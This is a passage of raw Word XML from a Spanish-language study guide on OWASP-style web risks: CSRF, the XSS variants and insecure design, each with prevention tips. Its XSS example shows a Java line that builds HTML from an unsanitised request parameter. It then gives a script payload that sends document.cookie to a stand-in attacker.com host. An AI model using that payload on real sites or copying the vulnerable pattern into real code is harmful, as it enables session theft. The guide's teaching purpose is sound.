    <w:p w14:paraId="041FDBED" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="482FC1D8" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201C1A80" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10188556" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37FB5196" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D77EF4" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3576B0A8" w14:textId="61B41646" w:rsidR="00302CCB" w:rsidRPr="00302CCB" w:rsidRDefault="0096040C" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Referencia</w:t>
      </w:r>
      <w:r w:rsidR="00E75C56" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00436253" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">La </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> permite que se envíen peticiones de cambio de estado. El atacante podría insertar código dentro de una etiqueta de imagen y cuando se ejecute la página en vez de cargar la imagen, se realiza una petición HTTP falsificada. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F751A58" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRPr="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="549891AB" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRPr="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevención </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF785AC" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRPr="00302CCB" w:rsidRDefault="0096040C" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Utilizar de token único y no predecible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471ED8DF" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRPr="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="0096040C" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>equerir nueva autenticación del usuario antes de ejecutar</w:t>
      </w:r>
      <w:r w:rsidR="00FE5CA7" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el pedido</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1311EA62" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRPr="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12389A3C" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRPr="00302CCB" w:rsidRDefault="00FE5CA7" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Secuencia de </w:t>
      </w:r>
      <w:r w:rsidR="00587577" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">omandos en </w:t>
      </w:r>
      <w:r w:rsidR="00587577" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">itios </w:t>
      </w:r>
      <w:r w:rsidR="00587577" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ruzados</w:t>
      </w:r>
      <w:r w:rsidR="00216C84" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (XSS)</w:t>
      </w:r>
      <w:r w:rsidR="00436253" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Ocurre cuando una aplicación toma datos no confiables, los envía al navegador sin validarlos y codificarlos apropiadamente. </w:t>
      </w:r>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>XSS permite a los atacantes ejecutar secuencias de comandos en el navegador de la víctima</w:t>
      </w:r>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Se puede secuestrar la sesión de usuario, destruir la web o dirigir al usuario hacia un sitio malicioso</w:t>
      </w:r>
      <w:r w:rsidR="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CF1836" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864" w:themeColor="accent5" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0F4737" w14:textId="77777777" w:rsidR="00CC6DCE" w:rsidRPr="00CC6DCE" w:rsidRDefault="00FE5CA7" w:rsidP="00CC6DCE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>XSS Reflejado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B5508C" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">La aplicación o API utiliza datos suministrados por un usuario sin ser validados o codificados apropiadamente como parte del </w:t>
      </w:r>
      <w:r w:rsidR="00587577" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidR="00B5508C" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de salida o cuando no existe un header que establezca la política de CSP. El usuario interactúa con un enlace o página controlada por el atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B681DD4" w14:textId="77777777" w:rsidR="00CC6DCE" w:rsidRPr="00CC6DCE" w:rsidRDefault="00B5508C" w:rsidP="00CC6DCE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>XSS Almacenado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> La aplicación o API almacena datos proporcionado por el usuario sin validar ni sanear. Es considerado nivel alto o critico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DB6CFF" w14:textId="47AEE3DB" w:rsidR="00B5508C" w:rsidRPr="00CC6DCE" w:rsidRDefault="00B5508C" w:rsidP="00CC6DCE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>XSS Basados en DOM:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Frameworks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en JS, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidR="00216C84" w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>página</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> única o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>APIs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que dinámicamente incluyen datos controlables por un atacante son vulnerables al DOM XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4FA1A2" w14:textId="32322351" w:rsidR="00CC6DCE" w:rsidRPr="00AE18AA" w:rsidRDefault="00CC6DCE" w:rsidP="00CC6DCE">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> La aplicación utiliza datos no confiables en la construcción del siguiente código HTML: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF3A8A6" w14:textId="1C0B2F30" w:rsidR="00CC6DCE" w:rsidRDefault="00CC6DCE" w:rsidP="00CC6DCE">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC6DCE">
        <w:t>(String) page += “&lt;input name=’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>creditcard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ type=’TEXT’ value =””” + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(“CC”) + “’&gt;”;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C832044" w14:textId="7014E35B" w:rsidR="00CC6DCE" w:rsidRPr="00AE18AA" w:rsidRDefault="00CC6DCE" w:rsidP="00CC6DCE">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>El atacante modifica el parámetro ’CC’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4FA0F8" w14:textId="09A40993" w:rsidR="00CC6DCE" w:rsidRDefault="00CC6DCE" w:rsidP="00CC6DCE">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>‘&gt;&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>=’http://www.attacker.com/cgi-bin/cookie.cgi?foo=’+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5A6965" w14:textId="77777777" w:rsidR="00CC6DCE" w:rsidRPr="00AE18AA" w:rsidRDefault="00CC6DCE" w:rsidP="00CC6DCE">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">De esta manera el atacante hace que el visitante ingrese al sitio web permitiendo así secuestrar la sesión actual del usuario. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E76C65F" w14:textId="77777777" w:rsidR="00CC6DCE" w:rsidRPr="00CC6DCE" w:rsidRDefault="00F87722" w:rsidP="00CC6DCE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prevención:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AE4F59" w14:textId="77777777" w:rsidR="00CC6DCE" w:rsidRPr="00CC6DCE" w:rsidRDefault="00F87722" w:rsidP="00CC6DCE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Codificar datos no confiables basados en el contexto HTML donde serán ubicados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAEACED" w14:textId="77777777" w:rsidR="00CC6DCE" w:rsidRPr="00CC6DCE" w:rsidRDefault="00CC6DCE" w:rsidP="00CC6DCE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00F87722" w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ista blanca</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9FE792" w14:textId="77777777" w:rsidR="00CC6DCE" w:rsidRPr="00CC6DCE" w:rsidRDefault="00CC6DCE" w:rsidP="00CC6DCE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00F87722" w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ara formato enriquecido utilizar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F87722" w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>APIs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F87722" w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F87722" w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>auto-sanitizacion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E54ACF3" w14:textId="2FA5043D" w:rsidR="00F87722" w:rsidRPr="00CC6DCE" w:rsidRDefault="00CC6DCE" w:rsidP="00CC6DCE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00F87722" w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>onsiderar el uso de políticas de seguridad de contenido CSP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8E6F05" w14:textId="77777777" w:rsidR="00B808FC" w:rsidRDefault="00B808FC" w:rsidP="00F13BEB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0FA723" w14:textId="77777777" w:rsidR="00CC6DCE" w:rsidRDefault="00CC6DCE" w:rsidP="00CC6DCE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190E0941" w14:textId="77777777" w:rsidR="00AE18AA" w:rsidRDefault="00F87722" w:rsidP="00F13BEB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A04 – Diseño </w:t>
      </w:r>
      <w:r w:rsidR="00B808FC" w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC6DCE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nseguro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35211E14" w14:textId="5A6F7636" w:rsidR="00F87722" w:rsidRPr="00AE18AA" w:rsidRDefault="00F87722" w:rsidP="00AE18AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Riesgo en el diseño y fallas arquitectónicas. Esto es un llamado a tener mayor uso de modelado de amenazas, patrones de diseño seguro y arquitecturas de referencia.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DE2A69" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AE18AA" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Descartar el </w:t>
      </w:r>
      <w:r w:rsidR="00DE2A69" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>preguntas y respuestas</w:t>
      </w:r>
      <w:r w:rsidR="00DE2A69" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
